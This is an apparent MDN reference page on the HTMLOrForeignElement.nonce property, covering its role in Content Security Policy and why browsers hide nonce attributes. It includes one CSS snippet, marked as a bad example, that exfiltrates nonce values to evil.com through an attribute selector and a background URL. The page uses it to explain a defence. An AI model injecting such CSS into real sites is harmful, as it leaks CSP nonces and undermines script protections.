---
title: HTMLOrForeignElement.nonce
slug: Web/API/HTMLOrForeignElement/nonce
tags:
  - API
  - Content Security Policy
  - Experimental
  - HTML DOM
  - HTMLElement
  - Property
  - Reference
  - nonce
---
<div>{{APIRef("HTML DOM")}}</div>

<p><span class="seoSummary">The <strong><code>nonce</code></strong> property of the {{DOMxRef("HTMLOrForeignElement")}} interface returns the cryptographic number used once that is used by <a href="/en-US/docs/Web/HTTP/CSP">Content Security Policy</a> to determine whether a given fetch will be allowed to proceed.</span></p>

<p>In later implementations, elements only expose their <code>nonce</code> attribute to scripts (and not to side-channels like CSS attribute selectors).</p>

<h2 id="Examples">Examples</h2>

<h3 id="Retrieving_a_nonce_value">Retrieving a nonce value</h3>

<p>In the past, not all browsers supported the <code>nonce</code> IDL attribute, so a workaround is to try to use <code><a href="/en-US/docs/Web/API/Element/getAttribute">getAttribute</a></code> as a fallback:</p>

<pre class="brush: js">let nonce = script['nonce'] || script.getAttribute('nonce');</pre>

<p>However, recent browsers version hide <code>nonce</code> values that are accessed this way (an empty string will be returned). The IDL property (<code>script['nonce']</code>) will be the only way to access nonces.</p>

<p>Nonce hiding helps preventing that attackers exfiltrate nonce data via mechanisms that can grab data from content attributes like this:</p>

<pre class="brush: css example-bad">script[nonce~=whatever] {
  background: url("https://evil.com/nonce?whatever");
}</pre>

<h2 id="Specifications">Specifications</h2>

<table class="standard-table">
 <thead>
  <tr>
   <th scope="col">Specification</th>
  </tr>
 </thead>
 <tbody>
  <tr>
   <td>{{SpecName('HTML WHATWG','#attr-nonce','nonce')}}</td>
  </tr>
 </tbody>
</table>

<h2 id="Browser_Compatibility">Browser Compatibility</h2>

<p>{{Compat("api.HTMLElement.nonce")}}</p>

<h2 id="See_also">See also</h2>

<ul>
 <li><a href="/en-US/docs/Web/HTTP/CSP">Content Security Policy</a></li>
 <li>CSP: {{CSP("script-src")}}</li>
</ul>
